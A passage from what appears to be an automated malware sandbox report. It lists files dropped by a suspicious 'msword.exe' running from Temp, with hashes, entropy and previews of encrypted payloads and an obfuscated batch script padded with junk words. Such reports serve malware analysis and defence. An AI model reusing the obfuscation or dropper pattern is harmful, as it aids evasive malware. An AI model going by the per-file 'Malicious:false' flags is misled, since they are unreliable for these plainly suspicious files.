                                                                  Preview:...?5.h!.....?.......?.......@.........................?..5.h!....>@...............................@................c.c.s...U.T.F.-.8...U.T.F.-.1.6.L.E.U.N.I.C.O.D.E.................................................................................8C......8C......0<......0<..+eG.W@..+eG.W@....B..?....B..?:;.....=:;.....=...t..?Z.fUUU.?...&WU.?{......?.......?.........9..B..@...2b....................................0<..0<.dW..dW................................@.......................................B.......B.................8..B..?0g.W..=.......................................?.......?......................0C......0C................................U....I.?.. ....u}.M.U..UUUUU.?Sz.....?........................................-DT.!.?.-DT.!..RUUUUU.?........v.F.$I.?.........3Y.E.?#Y...q...n.....?..;.9....../I.?hK.........d...?81.U.......H!G.?..#.$.....0|.f?.K.RVn...TUUUU.?........~I..$I.?.g......HB.;E.?.....q.....{.?.x...................................?...... @...... @.......?

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Next

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):98304
                                                                  Entropy (8bit):7.9979666143694095
                                                                  Encrypted:true
                                                                  SSDEEP:1536:WdRAC50xWY7+r0weiORc8vTDzcvmgmQj21JVWAQfqB+ILeLBuQi2FUqAqT3Y4+/u:GvY7+rJenS8vTvcvHj2zVWxfq5Uu5pqn
                                                                  MD5:52C875EB8A3EBC4643094465CDBB08D0
                                                                  SHA1:013139AD7BBE0E2522CCC69EE890E63D8CA3FF3C
                                                                  SHA-256:A363E5C9DD6872D625FDF1A6E957D0E08B4605E97D8130B0175A6889BE5196EC
                                                                  SHA-512:97A6489038FF72109EA847A94C55DB9798F165E3D570F8677C6139C930DC67420BA783BE2F3939B74676C673D6AAA7EF2CAB107DBF7908A5CE228916FCDAAB0B
                                                                  Malicious:false
                                                                  Preview:....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.....*....,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{|.8.L.o;,.V...vC...B.p.X(T%..q..T..z....*......M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[.*.I...?.v.tfJ..9....+..*J.....g.....g.WK.....\

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nr

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:ASCII text, with very long lines (975), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):23449
                                                                  Entropy (8bit):5.134148367041093
                                                                  Encrypted:false
                                                                  SSDEEP:384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
                                                                  MD5:9EF6EFA272560F1DEE8923508DAFE2C9
                                                                  SHA1:7E6572FA616E8FE8AB67D2518F8685EB01F46923
                                                                  SHA-256:3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
                                                                  SHA-512:D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
                                                                  Malicious:false
                                                                  Preview:Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nr.cmd (copy)

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:ASCII text, with very long lines (975), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):23449
                                                                  Entropy (8bit):5.134148367041093
                                                                  Encrypted:false
                                                                  SSDEEP:384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
                                                                  MD5:9EF6EFA272560F1DEE8923508DAFE2C9
                                                                  SHA1:7E6572FA616E8FE8AB67D2518F8685EB01F46923
                                                                  SHA-256:3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
                                                                  SHA-512:D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
                                                                  Malicious:false
                                                                  Preview:Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Protocol

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):43912
                                                                  Entropy (8bit):7.0754478586730984
                                                                  Encrypted:false
                                                                  SSDEEP:768:tBGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:tBGmdATGODv7xvTphAiPChgZ2kOE6
                                                                  MD5:28E6332970BFF06A0431BFEFBCD59462
                                                                  SHA1:20902CDBF1A8D4DC081ADB967692C0C4ADD030BC
                                                                  SHA-256:85C250563E37692A5A0188EAC2EE3E27D6A7DAB102E0200DF20D027B33DE8E91
                                                                  SHA-512:CB1FB1F5A97E6A4F790D61E6964FFA4967591946DC03C639E944455DE893070547DA9B5401952DD5FA93FF66CF5F66F7A15F04913C41F4514A7DE067C8E6F60C
                                                                  Malicious:false
                                                                  Preview:..].........`...]...]...]...........0................]...]...]...]...]...]...]...]....................................p...]...]...]...]...p...................................................................................................0.........................0......................................................................................00......h..... ....................(.....00............ ....................h........... .A?....00.... ..%.... .... ............. .h...........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee..................................................................................................................................................................7............................................(.........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee.................................................................

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Realm

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):42495
                                                                  Entropy (8bit):7.994847286020057
                                                                  Encrypted:true
                                                                  SSDEEP:768:0SLfZMdEvp3jxmff02Y0Vo91+u08R48OcPk4h+ZnWlJcCQbem8OU3VOmWZ:bZg02tV21q1P4h3wHAFOmWZ
                                                                  MD5:062E20D07FE052044D9339A8B3F1CB38
                                                                  SHA1:5428326E6D395EEBABEB3FFB1972AE6A8C3DA8AE
                                                                  SHA-256:84DB270DF2972367E799A4F919E5033475A5395B9AD59F50456E340A980B693A
                                                                  SHA-512:2EE25F17BB5BE528ABD2CE9FE4877BFA58B2D30A9503D22B31DD16C80A7B248D14142AAB42ACFFD0A069975490CF370435310E08187311365136680657D3BDF1
                                                                  Malicious:false
                                                                  Preview:.M<..l.v.;. FB.4.h{..I.....jo_..~6s..7..bM.}..V.&.o_Y..k..`.x..q...H....6u.`T."....t.v..D.d\tv..J............{.'....S..)..u.nCb.>.0g.uh'.A4.&#o..J..w...g.......eh.K.z...D)78.6.H.S..aP.]...|.....f...zDnlM3.......G\.M...3T..Ow.....z-3...Z,..L...k.\@....43.....j... .$r0H........+.....}..o#.h....t.L.U.X.).t....]&..@...I..".it...4..p].F.(,O.".{.>..s-._$...(.%ZKG.o.6xr|....8.Y...%..J.0.I...P....Io.....1;Z.u..uZ.e..Jr....$.I.{.W..l.....d.@C.`+L. .A.}W..d.X.c..)a.&.P.9 Y....R.R...?o..>......GX.D..i.{.m.?>..<..W+..s8.uK....D...H....Vk.la.X...w..D....t..k.HW....OA....~dU|^DC....D..>...{.t8,o....l.q.nXu.]=4...K.@[?wpn..nY...Q...A.$..=@G....J.O..H.~..:i....!...w..*A=".|.z.jcm........4T...o.,...c1~..B....Yz...8.5qu.<....H..&....[.n..3.=...-l6Z..s...i,0......*.T.{r...F.":. .......j.r-j'3.!....=..iE.oJ.^0;....q/z.]..u"I..X..d..m..Z..L...x....<..g.$...s.*......)..[G.......6.".....f.5.@{..!.+j..yf..iz...=...V.d........6...k.uE]6....Q...mV.i.FU.......v.w..

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Substantial

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):58368
                                                                  Entropy (8bit):7.996685518527556
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Kftiu0ideTjMGF6+YCYNRbYPUU1gqE1oe6kWjlu:958eTN6rCeYPz1gMeClu
                                                                  MD5:734A793F9424DE731EEE480B610E0257
                                                                  SHA1:DD2073F71258FC036517ED503B3F85FD8ECDFDA6
                                                                  SHA-256:0915FFDD69CF4511B586769737D54C9FF5B53EDA730ECA7A4C15C5FF709315EC
                                                                  SHA-512:194915FEEFA2E7D04F0683FD5AF0F37FC550F1A8F4883D80D4CE0E4B6E4091BD9049A52E0FB3E5D3DB872B711431E1D5E7800AA206E3B5654DFD1266FB452335
                                                                  Malicious:false
                                                                  Preview:|U.A&..).?.<.`...D0.3.!=H..Id.,....@r...X...{P.@O.^.G..i.N.d.;k.GjcuuwC.h....E%t.Z..:...T:.s"..',...<.."(._.zk`..|.U...*......L]....{.:.4.....z.!...<..m.3.3..lK..E.u..-..#S.l8.F.G....*.B .h.v..99.6P;..a..O.T..eK...q.j:.4...F\B>c.>r{...4..&U......./.qH...@..U..>...6.B...(d.8......`.L.N......r4.e...fp..X.....w....[K.g.|....om.,.z.Q...fdC..s..n.h...{F.h...,.j].z..?.^.Y.::.-+8....}W.....m..h.Q..Vo..1.g....M......i...R.v3.i29jdc...3\[:..r@.TbPN....pL..Xc.6/T..v..n_..0[........o....TE.`S...N....Kj6hamK...o.0_.H$..... .!a..?u.;.=..C..xp..[.s........O..b.H|....96h..V....??%......9.8.)..*.4L..J..R...9%..O.'..O= a.6..K.o.......}..F....M5e.....8.p.....kqq...eL.u%.....6.66M'n.Uz.....(...?vz.,.2VB'.....:h.#o.8..~..@.6.?m..5.....8....pFX$..M8.%q......`s...y.Nudh.........R...9W[..>%.6O.X.....G.....@...$../.<j.t2.O@r..x.{._.....c!....d%.".y....I.8I./........'q.F....@.+..h..c....j.x.m..M.q.).].c......q.o...ahn..c.-a......Y..+^.G....@.8.....;H..X..t

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Undefined

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):67584
                                                                  Entropy (8bit):7.996945320826708
                                                                  Encrypted:true
                                                                  SSDEEP:1536:9bqjXKdCr6Qw/ljXmAZUNbHaQPc0osgAuB6mrQjh4GVnY4t8PwMU:9OadCretrniNX1osgAGrQh4GVY4ePwMU
                                                                  MD5:10CF860D6ED7F8B77D7F02A407DDDE2C
                                                                  SHA1:42C54FF8B32BD09B583E544837A65248AF7B60AB
                                                                  SHA-256:A4E09DE3E94F24B4D2D780667569166F242486A7912706A58AB32CF88F547069
                                                                  SHA-512:355179700261EE76D67CEFCC27A120CA636278636420DF8D5CCE965055CC05F5249F86230A4C1695FCD3DB4A9B91CFD0D1AF5E6723F3A9B396DB1F4B70EC0052
                                                                  Malicious:false
                                                                  Preview:>.m....\qG..........h......y(..].....b8.Bt>f)iW/m..'...=.~Z......?......n.'..1M..w.D.9. .u.y.Ta+...$..Q.v..8........O..X..K.W.....x.".E.."g....9.fk.#.=.....:.OB..7..Tf.4...1AK..}..Y..?..)...V..Jr.v...9...!.2..i.B.!....ji..&.e...Q...*;..k..U11.ov..I.....{q.\.T&.#..r.9.(v-r../....}.T......f..J..%.|u...A..&...S[s....4.j$P..PV..M..s.739$...}..W{.f..&....A..h.....Ye.v......!.+.F.E.1.e...c.....i....D..n.&..g.d....Hx\....b.......N..0.^..O...@j....'..Z.~......w}....g...c....V..b......t..%.....].`@e.`...._......vX.A._....?...Pp.DG.7m.R..4G3@....uy...;L'..II{*....M...Fv.[..<.Vm".....P.w.\......%.kY.^.L[..h.s..`..E.>....g..^.. 8.*..#.[HY@.8.......N.7...m....T...<."}H..3.!.9N$..,.bF.@.......nkP.8.R.-J.~K..<.,...f.vL..........YPA...LHl5\..H....c..G."h..s..X..X.......8...U....,..s`.i......E...o.C'.&+.Lb.&......[t1..>..`t......&`CE.9=..m4..3f|.Y@X..,.u.C.o~....L.E....2.K..}..*;....e....w...U...L...7#.|..`5g.x<....../.]^.j.,y.#W.....B\.y

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1688
                                                                  Entropy (8bit):5.440222955117128
                                                                  Encrypted:false
                                                                  SSDEEP:48:5WSU4Yymp+ms4RIoU99tK8NWR8PSNhXR908dyK:5LHYvVsIfA2KWEkS8EK
                                                                  MD5:817699EF517453F9AA12C432A956FFEC
                                                                  SHA1:63175FDE82E9438679D498A8891A9342BF61F181
                                                                  SHA-256:852B9571EE25C27421DBA952D3B4DA39D1730BBD11D9918FF9179F91B5A31D71
                                                                  SHA-512:62EADC2330D2E3FD5C540D63134016D6BC41A9D9371E89E86661067039C76F7DE38E84E7F24882A238A46115A63123EAA082350FA83BA7903D059527A1584EF3
                                                                  Malicious:false
                                                                  Preview:@...e...........>...............................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                  C:\Users\user\AppData\Local\Temp\MSI269f6.LOG

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):246
                                                                  Entropy (8bit):3.511206980872271
                                                                  Encrypted:false
                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8yQpClE3Gl1lww:Qw946cPbiOxDlbYnuRKTWD3Gl1H
                                                                  MD5:625D5A93B9FEDFC3689FA05FD1434068
                                                                  SHA1:20A36A04ED271C51920F6227C43A53CA25FE81E8
                                                                  SHA-256:DE343CC27FC02783FCAE4B87106E54A7CE1DEEA820C03D7DF6A59D00C84E6D77
                                                                  SHA-512:1AE0010977FCB85E515935819887FBA581CF8C564CE52A637F383B62844D4F07CD0361B693C6BDED41F690BA059AE38D9E24B1969802CCA3D075FECD7B05C7B5
                                                                  Malicious:false
                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.7./.0.1./.2.0.2.5. . .1.2.:.1.3.:.0.9. .=.=.=.....

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a05a4nvz.5sm.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2e3o3sf.hbt.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4t3ffch.53c.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfx1tfat.iec.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v25sahxe.1ot.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yh1v2nnx.mrb.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuo4nwjj.2cm.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoeli0wi.5gn.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-07 12-13-04-288.log

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with very long lines (393)
                                                                  Category:dropped
                                                                  Size (bytes):16525
                                                                  Entropy (8bit):5.345946398610936
                                                                  Encrypted:false
                                                                  SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                  MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                  SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                  SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                  SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                  Malicious:false
                                                                  Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):15114
                                                                  Entropy (8bit):5.370255401617607
                                                                  Encrypted:false
                                                                  SSDEEP:384:9mj2TTCsgNWcTm8mLMjc9D90sH98fhJaDgnJjbp3DehbxmVMkn91qhqXuB/ntFV/:zR//Lp9Qk
                                                                  MD5:5B8485C15D7A011C1D596440D632DFF1
                                                                  SHA1:4E4A7A0D7CCFC4BE2AF238B217035CE238008263
